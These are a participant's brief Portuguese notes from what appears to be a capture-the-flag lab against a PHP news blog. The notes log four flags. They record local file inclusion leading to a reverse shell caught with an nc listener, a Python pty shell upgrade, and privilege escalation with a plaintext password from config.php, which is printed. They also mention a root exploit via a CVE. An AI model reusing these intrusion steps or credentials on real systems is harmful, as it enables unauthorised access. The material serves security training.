1 flag:
local: comentado na pagina noticias.php
salvo em 98.86.169.119-noticias-php
 <!--Solyd{9NewsNews!!!NothingWrongHereVerySecure!!!9}-->


2 flag:
local raiz do projeto atraves de um LFI — Local File Inclusion na url foi possivel colocar um codigo pra criar uam shell reversa usando o o script shell_reverse.sh
flags salva como falg.txt
nc -lnvp 4444  
listening on [any] 4444 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 36838
bash: cannot set terminal process group (26): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ip-10-0-99-169:/var/www/blogo$ ls -la 
ls -la
total 828
drwxrwxrwx 1 root     root       4096 Feb 14 11:45 .
drwxr-xr-x 1 root     root       4096 Jan 14 14:24 ..
-rw-r--r-- 1 www-data www-data 312917 Jan 13 18:38 aetherpharma.png
-rw-r--r-- 1 www-data www-data    580 Jan 14 23:19 back.zip
drwxr-xr-x 2 www-data www-data   4096 Jan 14 23:39 config
-rw-r--r-- 1 www-data www-data 466106 Jan 13 18:38 festas-ano-novo.png
drwxrwxrwx 2 www-data www-data   4096 Jan 15 11:54 files
-rw-r--r-- 1 www-data www-data   7988 Jan 16 03:01 index.html
-rw-r--r-- 1 www-data www-data  12408 Jan 15 12:55 noticias.php
-rw-r--r-- 1 www-data www-data    105 Feb 14 11:45 rev.php
-rw-r----- 1 mysql    mysql        55 Jan 15 12:27 shell.php
-rw-r----- 1 www-data root       2588 Jan 15 11:57 test.php
-rw-r----- 1 mysql    mysql         5 Jan 15 12:16 test.txt
www-data@ip-10-0-99-169:/var/www/blogo$ cd ../../../
cd ../../../
www-data@ip-10-0-99-169:/$ ls -la
ls -la
total 72
drwxr-xr-x   1 root root 4096 Feb 14 11:28 .
drwxr-xr-x   1 root root 4096 Feb 14 11:28 ..
-rwxr-xr-x   1 root root    0 Feb 14 11:28 .dockerenv
lrwxrwxrwx   1 root root    7 Apr 22  2024 bin -> usr/bin
drwxr-xr-x   2 root root 4096 Apr 22  2024 boot
drwxr-xr-x   5 root root  360 Feb 14 11:28 dev
drwxr-xr-x   1 root root 4096 Feb 14 11:28 etc
-rw-r--r--   1 root root   30 Jan 15 12:57 flag.txt
drwxr-xr-x   1 root root 4096 Jan 12 17:24 home
lrwxrwxrwx   1 root root    7 Apr 22  2024 lib -> usr/lib
drwxr-xr-x   2 root root 4096 Jan 18  2024 lib.usr-is-merged
lrwxrwxrwx   1 root root    9 Apr 22  2024 lib64 -> usr/lib64
drwxr-xr-x   2 root root 4096 May 28  2025 media
drwxr-xr-x   2 root root 4096 May 28  2025 mnt
drwxr-xr-x   2 root root 4096 May 28  2025 opt
dr-xr-xr-x 181 root root    0 Feb 14 11:28 proc
drwx------   1 root root 4096 Jan 15 22:24 root
drwxr-xr-x   1 root root 4096 Jan 12 17:41 run
lrwxrwxrwx   1 root root    8 Apr 22  2024 sbin -> usr/sbin
drwxr-xr-x   2 root root 4096 May 28  2025 srv
dr-xr-xr-x  13 root root    0 Feb 14 11:27 sys
drwxrwxrwt   1 root root 4096 Feb 14 11:28 tmp
drwxr-xr-x   1 root root 4096 May 28  2025 usr
drwxr-xr-x   1 root root 4096 Jan  7 19:05 var
www-data@ip-10-0-99-169:/$ cat flag.txt
cat flag.txt
Solyd{#!UhOh#!Y0uAr3In#!#941}



3 flag:
local: na raiz do usuario adalberto nomeada de flag.txt possivel escalação de privelegio atraves de senha achada no config.php salvo em credecial.txt
www-data@ip-10-0-99-169:/var$ cd ..
cd ..
www-data@ip-10-0-99-169:/$ ls -la
ls -la
total 72
drwxr-xr-x   1 root root 4096 Feb 14 11:28 .
drwxr-xr-x   1 root root 4096 Feb 14 11:28 ..
-rwxr-xr-x   1 root root    0 Feb 14 11:28 .dockerenv
lrwxrwxrwx   1 root root    7 Apr 22  2024 bin -> usr/bin
drwxr-xr-x   2 root root 4096 Apr 22  2024 boot
drwxr-xr-x   5 root root  360 Feb 14 11:28 dev
drwxr-xr-x   1 root root 4096 Feb 14 11:28 etc
-rw-r--r--   1 root root   30 Jan 15 12:57 flag.txt
drwxr-xr-x   1 root root 4096 Jan 12 17:24 home
lrwxrwxrwx   1 root root    7 Apr 22  2024 lib -> usr/lib
drwxr-xr-x   2 root root 4096 Jan 18  2024 lib.usr-is-merged
lrwxrwxrwx   1 root root    9 Apr 22  2024 lib64 -> usr/lib64
drwxr-xr-x   2 root root 4096 May 28  2025 media
drwxr-xr-x   2 root root 4096 May 28  2025 mnt
drwxr-xr-x   2 root root 4096 May 28  2025 opt
dr-xr-xr-x 185 root root    0 Feb 14 11:28 proc
drwx------   1 root root 4096 Jan 15 22:24 root
drwxr-xr-x   1 root root 4096 Jan 12 17:41 run
lrwxrwxrwx   1 root root    8 Apr 22  2024 sbin -> usr/sbin
drwxr-xr-x   2 root root 4096 May 28  2025 srv
dr-xr-xr-x  13 root root    0 Feb 14 11:46 sys
drwxrwxrwt   1 root root 4096 Feb 14 11:28 tmp
drwxr-xr-x   1 root root 4096 May 28  2025 usr
drwxr-xr-x   1 root root 4096 Jan  7 19:05 var
www-data@ip-10-0-99-169:/$ cd home
cd home
www-data@ip-10-0-99-169:/home$ ls -la
ls -la
total 16
drwxr-xr-x 1 root      root      4096 Jan 12 17:24 .
drwxr-xr-x 1 root      root      4096 Feb 14 11:28 ..
drwxr-x--- 1 adalberto adalberto 4096 Jan 15 22:23 adalberto
drwxr-x--- 2 ubuntu    ubuntu    4096 May 28  2025 ubuntu
www-data@ip-10-0-99-169:/home$ python3 -c 'import pty; pty.spawn("/bin/bash")'
<me$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@ip-10-0-99-169:/home$ su adalberto
su adalberto
Password: WPcmqw16ZmzO!5paSC4

adalberto@ip-10-0-99-169:/home$ ls -la
ls -la
total 16
drwxr-xr-x 1 root      root      4096 Jan 12 17:24 .
drwxr-xr-x 1 root      root      4096 Feb 14 11:28 ..
drwxr-x--- 1 adalberto adalberto 4096 Jan 15 22:23 adalberto
drwxr-x--- 2 ubuntu    ubuntu    4096 May 28  2025 ubuntu
adalberto@ip-10-0-99-169:/home$ cd adalberto
cd adalberto
adalberto@ip-10-0-99-169:~$ ls -la
ls -la
total 36
drwxr-x--- 1 adalberto adalberto 4096 Jan 15 22:23 .
drwxr-xr-x 1 root      root      4096 Jan 12 17:24 ..
-rw------- 1 adalberto adalberto    6 Jan 16 11:01 .bash_history
-rw-r--r-- 1 adalberto adalberto  220 Mar 31  2024 .bash_logout
-rw-r--r-- 1 adalberto adalberto 3792 Jan 12 17:24 .bashrc
drwxrwxr-x 1 adalberto adalberto 4096 Jan 12 17:27 .cargo
-rw-r--r-- 1 adalberto adalberto  828 Jan 12 17:24 .profile
drwxrwxr-x 6 adalberto adalberto 4096 Jan 12 17:25 .rustup
-rw-r--r-- 1 root      root        53 Jan 15 13:00 flag.txt
adalberto@ip-10-0-99-169:~$ cat flag.txt
cat flag.txt
Solyd{Its*Always*Easier*To*Have*One*Strong*Password}
adalberto@ip-10-0-99-169:~$ 
(observação essa senha e a mesma do usuario blogo no banco de dados
foi necessario usar o python3 -c 'import pty; pty.spawn("/bin/bash")'
para estabelecer a shell e se conectar no usuario)
 apos conseguir a escalação de privelegio atraves da CVE sobre o below conseguimos a 4 flagroot@ip-10-0-55-149:~# cat flag.txt
cat flag.txt
Solyd{U$G0T$R007%Congrats!!!!}
